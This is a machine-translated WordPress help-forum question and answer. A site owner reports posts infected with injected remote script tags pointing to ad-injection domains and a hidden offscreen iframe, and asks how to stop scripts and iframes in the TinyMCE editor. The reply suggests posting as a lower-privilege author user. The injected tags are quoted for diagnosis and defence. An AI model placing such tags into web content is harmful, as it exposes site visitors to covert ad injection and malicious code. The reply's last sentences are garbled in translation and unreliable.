私のクライアントは悪意のあるスクリプトやインラインフレームによって注入された200の投稿を持っています。ウェブサイトはすべてクリアされました。
私のクライアントコンピュータが感染したので、それらはユーザーが投稿/ページを更新することによってコンテンツに入れられました。 (ただしTinyMCEエディタのみ - 特定のページや投稿に割り当てられた他のカスタムフィールドはありません)
このWebサイトの正確なスクリプトは以下のようになりました。
<script src="//serverads.net/599b47260394deb2d8.js"></script>
<script src="//pulseadnetwork.com/a/display.php?r=1131815"></script>
<script src="http://serverads.net/addons/lnkr5.min.js" type="text/javascript"></script>
Iframeは次のようになりました。
<iframe style="position: absolute; left: -1000px; top: -1000px; width: 1px; height: 1px; visibility: hidden; border: none; background-color: transparent;" src="//pulseadnetwork.com/pix.html"></iframe>
今後これが起こらないようにするために、WordPressのTinyMCEに配置されているスクリプトやiframeを完全に無効/無効にすることは可能ですか?
WordPresのバージョン:4.4.2
そしてはい、私は知っています - これは私のクライアントコンピュータを修正することはできません。しかし、悪意のあるコードがTinyMCEエディタに侵入し、将来クライアントのWebサイトの訪問者をスパムするのを防ぐことが最も確実であると期待しています。
簡単な方法、管理者ユーザーとしてログインした場合はコンテンツを追加せず、作成者としてのみ追加します。あなたがやや極端に行きたい場合は、管理者から投稿機能を削除してください。どこに編集スラッグがあるのかわからないので、許可の適切なチェックが必要になります。
これは、作成者ユーザーがスクリプトやインラインフレームをコンテンツに追加することを許可されていないというあなたの質問に答えます。 WP APISを経由せずにDBレベルを変更するだけで、自分が好きな権限を自分に付与するためのログイン。